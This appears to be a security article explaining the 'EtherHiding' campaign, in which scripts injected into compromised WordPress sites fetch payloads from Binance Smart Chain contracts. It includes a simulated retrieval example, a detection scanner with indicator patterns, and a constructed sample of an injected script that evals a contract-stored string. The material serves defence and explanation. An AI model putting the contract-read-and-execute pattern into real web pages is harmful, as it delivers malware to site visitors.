Threat actors have adopted a technique dubbed ‘EtherHiding’ that stores malicious scripts in Binance Smart Chain contracts and has compromised websites retrieve them at page load. Because the contract lives on a public, decentralized blockchain rather than on a server that a hosting provider can take down, the delivery chain is hard to track and harder still to disrupt.

Description

Previously, these threat actors targeted vulnerable WordPress sites, injecting hidden JavaScript that controlled what visitors were served and pushed malware through fake browser-update warnings [4]. They have now shifted to the blockchain as a more resilient place to host the part of the chain that used to sit on a takedown-prone server.

The attackers inject obfuscated JavaScript into compromised websites. When a visitor loads the page, that script queries a Binance Smart Chain contract for the next-stage payload, which in turn contacts a command-and-control server [2]. The payload shows the victim a prompt that leads to the download of a malicious executable. The same actors have also been observed using a JavaScript framework deployed on compromised websites to deliver malware through drive-by downloads [2].

This attack chain has been linked to malware loaders such as IDAT Loader and HijackLoader [2], which serve as launchpads for a range of stealers and trojans [2]. There are also tactical overlaps between EtherHiding and the SocGholish malware family, which suggests that one threat group may be behind both.

Binance Smart Chain, a blockchain platform that competes with Ethereum [3], has been described by the researchers who documented the campaign as a “next level of bulletproof hosting” [1] [2] [3] [4] [5]. The attackers use vulnerable WordPress sites or compromised admin credentials to inject script tags into web pages. Those tags load the Binance Smart Chain JavaScript library and use it to fetch malicious scripts stored in a smart contract [5]. The fetched scripts then trigger the download of a third-stage payload [5], which prompts users to update their browser and leads to the download of a malicious executable [5].
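To make the retrieval step concrete, here is an added example written for this page (it is not code from the attackers or from any of the cited reports) that simulates the contract query in plain JavaScript. The chain is an in-memory stand-in, the contract address and the two URLs are made up, and it is assumed that the contract exposes a `get()` function returning an ABI-encoded string, which is how a web3 library would call it. What the example shows is that the victim side uses `eth_call`, a free read that creates no transaction and leaves nothing on chain, while the attacker changes what every compromised site fetches by sending a single transaction that updates the contract's storage.

```javascript
// Added example: simulated EtherHiding retrieval step. Nothing here touches a
// network; the "chain" is an in-memory map and all addresses/URLs are made up.

// keccak256("get()") truncated to 4 bytes: the selector a web3 library sends
// when calling a contract function named get() with no arguments.
const GET_SELECTOR = "0x6d4ce63c";

const toHex = (bytes) => Array.from(bytes, (b) => b.toString(16).padStart(2, "0")).join("");
const fromHex = (hex) => Uint8Array.from(hex.match(/../g) || [], (h) => parseInt(h, 16));
const word = (hex) => hex.padStart(64, "0"); // one 32-byte ABI word as 64 hex chars

// Solidity ABI encoding of a dynamic `string` return value:
// word 0 = offset to the data (0x20), word 1 = byte length, then the bytes
// right-padded to a 32-byte boundary.
function abiEncodeString(s) {
  const bytes = new TextEncoder().encode(s);
  const data = toHex(bytes);
  const padded = data.padEnd(Math.ceil(data.length / 64) * 64, "0");
  return "0x" + word("20") + word(bytes.length.toString(16)) + padded;
}

function abiDecodeString(hex) {
  const h = hex.startsWith("0x") ? hex.slice(2) : hex;
  const offset = parseInt(h.slice(0, 64), 16) * 2;        // bytes -> hex chars
  const len = parseInt(h.slice(offset, offset + 64), 16); // byte length
  const data = h.slice(offset + 64, offset + 64 + len * 2);
  return new TextDecoder().decode(fromHex(data));
}

// Stand-in for the blockchain: contract storage plus a count of transactions.
class FakeChain {
  constructor() { this.storage = new Map(); this.transactions = 0; }

  // Attacker side: a state-changing transaction. Costs gas, is signed by the
  // attacker's key, and is recorded on chain permanently.
  sendTransaction(contract, newPayload) {
    this.storage.set(contract, newPayload);
    this.transactions += 1;
  }

  // Victim side: eth_call evaluates the function against current state.
  // No gas, no signature, nothing written to the chain.
  ethCall({ to, data }) {
    if (data !== GET_SELECTOR) throw new Error("unknown function selector " + data);
    return abiEncodeString(this.storage.get(to) ?? "");
  }
}

// Shape of the JSON-RPC body the injected script sends to the RPC endpoint.
function buildEthCallRequest(contract) {
  return { jsonrpc: "2.0", id: 1, method: "eth_call",
           params: [{ to: contract, data: GET_SELECTOR }, "latest"] };
}

// The loader's retrieval step: query the contract, decode the string it holds.
// (Here the stored string is just a location; the real second stage is a script.)
function fetchNextStage(chain, contract) {
  const req = buildEthCallRequest(contract);
  return abiDecodeString(chain.ethCall(req.params[0]));
}

// One re-pointing: the attacker swaps the next-stage location with a single
// transaction and every compromised site picks up the new value on its next read.
function demo() {
  const chain = new FakeChain();
  const CONTRACT = "0x" + "11".repeat(20); // made-up contract address
  chain.sendTransaction(CONTRACT, "https://c2-a.invalid/stage3.js"); // made-up, not a real C2
  const first = fetchNextStage(chain, CONTRACT);
  chain.sendTransaction(CONTRACT, "https://c2-b.invalid/stage3.js");
  const second = fetchNextStage(chain, CONTRACT);
  return { first, second, transactions: chain.transactions };
}

console.log(demo());
```

The asymmetry is the whole point of the technique: the only on-chain activity is the attacker's update transaction, while the reads from thousands of victim browsers are ordinary `eth_call` requests to a public RPC endpoint that look no different from a price widget querying a token contract.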

Because the script is read straight from a decentralized blockchain, there is no hosting provider to send a takedown request to, and the attackers can change the command-and-control address simply by updating the data the contract holds, sidestepping blocks on any single domain [5]. Once a smart contract is deployed on the Binance Smart Chain it runs autonomously and cannot be removed [5]. Calling the attacks “unblockable” overstates it, though: the compromised site still has to serve the injected script tag, the visitor's browser still has to load the web3 library and contact a public RPC endpoint to read the contract, and each of those is something a defender can monitor or block.
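Since the injected script tag, the library it loads and the RPC endpoint it talks to are the parts of the chain defenders can still see, here is an added example written for this page (not code from any of the cited reports) of a heuristic scan over the HTML a site serves. The indicator patterns, their weights and the three page samples are constructed for illustration; the RPC hostnames are the public BSC `bsc-dataseed` endpoints, and the verdict rule treats a contract read combined with dynamic code execution (`eval`, `new Function`, `document.write`) as the injection signature, so that a legitimate dapp page that reads a contract and merely renders the result is flagged for review rather than as injected.

```javascript
// Added example: heuristic scan of served HTML for EtherHiding-style injection.
// Patterns and weights are illustrative assumptions; tune them to your environment.

const INDICATORS = [
  // Blockchain client library pulled in by a page that has no business with crypto
  { name: "web3-library", weight: 2,
    re: /<script[^>]+src=["'][^"']*(?:ethers|web3)(?:\.min)?\.js/i },
  // Public BSC JSON-RPC endpoints a browser would contact to read the contract
  { name: "bsc-rpc-endpoint", weight: 3,
    re: /bsc-dataseed\d*\.(?:binance|bnbchain)\.org/i },
  // A contract read: raw eth_call, web3's .call(), or a view-function ABI fragment
  { name: "contract-read", weight: 2,
    re: /\beth_call\b|\.call\(\)|\bview\s+returns\b/i },
  // The fetched string being executed rather than displayed
  { name: "dynamic-exec", weight: 3,
    re: /\beval\s*\(|new\s+Function\s*\(|document\.write\s*\(/ },
];

function scanHtml(html) {
  const hits = INDICATORS.filter((ind) => ind.re.test(html)).map((ind) => ind.name);
  const score = INDICATORS.filter((ind) => hits.includes(ind.name))
                          .reduce((sum, ind) => sum + ind.weight, 0);
  // Verdict: reading a contract AND executing the result is the injection
  // signature; reading and rendering is what a real dapp does.
  let verdict = "clean";
  if (hits.includes("dynamic-exec") &&
      (hits.includes("contract-read") || hits.includes("bsc-rpc-endpoint"))) {
    verdict = "likely-injected";
  } else if (score >= 4) {
    verdict = "review";
  }
  return { score, hits, verdict };
}

// pages: { url: html } -> { url: scan result }
function scanSite(pages) {
  return Object.fromEntries(Object.entries(pages).map(([url, html]) => [url, scanHtml(html)]));
}

// Constructed samples (not captured from any real site).
const SAMPLES = {
  // A blog whose <head> has been injected: library + BSC RPC + contract read + eval
  "https://blog.example/post": `<html><head>
<script src="https://cdn.example/ethers.min.js"></script>
<script>const p=new ethers.providers.JsonRpcProvider("https://bsc-dataseed1.binance.org/");
const c=new ethers.Contract("0x${"ab".repeat(20)}",["function get() view returns (string)"],p);
c.get().then(s=>eval(s));</script>
</head><body><h1>Weekly recipes</h1></body></html>`,
  // A legitimate dapp page: same library and read, but the value is rendered, not executed
  "https://dapp.example/": `<html><head>
<script src="https://cdn.example/ethers.min.js"></script>
<script>const p=new ethers.providers.JsonRpcProvider("https://bsc-dataseed.binance.org/");
const c=new ethers.Contract("0x${"cd".repeat(20)}",["function name() view returns (string)"],p);
c.name().then(s=>{document.getElementById("t").textContent=s;});</script>
</head><body><span id="t"></span></body></html>`,
  // An untouched page
  "https://blog.example/about": `<html><head><script src="/assets/app.js"></script></head>
<body><p>About us</p><script>document.getElementById("y").textContent=new Date().getFullYear();</script></body></html>`,
};

console.log(scanSite(SAMPLES));
```

Run this over a crawl of your own site's rendered HTML, or over the WordPress `wp_posts` and theme files directly, and pair it with egress monitoring: a browser on a recipe blog has no reason to contact `bsc-dataseed*.binance.org`, so the RPC hostname alone is a strong signal in proxy or DNS logs even when the injected script is too obfuscated for the static patterns to catch.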

Conclusion

The recommended mitigations [5] are to keep WordPress core and plugins updated [4], safeguard administrator credentials [4], and monitor site content and activity for unexpected script injections [4]. The impact of these attacks is significant because they move the part of the chain that defenders used to take down, the script-hosting server, onto a decentralized ledger that no single party can remove. Defenders should expect further abuse of public blockchains as hosting and build detection around the web-side indicators that remain.

References

[1] https://cyber.vumetric.com/security-news/2023/10/13/hackers-use-binance-smart-chain-contracts-to-store-malicious-scripts/
[2] https://thehackernews.com/2023/10/binances-smart-chain-exploited-in-new.html
[3] https://www.techradar.com/pro/security/hackers-are-hiding-malicious-code-in-binance-smart-chain-contracts
[4] https://coinpaper.com/2428/ether-hiding-hackers-leverage-word-press-vulnerabilities-to-deliver-malware-through-binance-smart-chain
[5] https://www.redpacketsecurity.com/hackers-use-binance-smart-chain-contracts-to-store-malicious-scripts/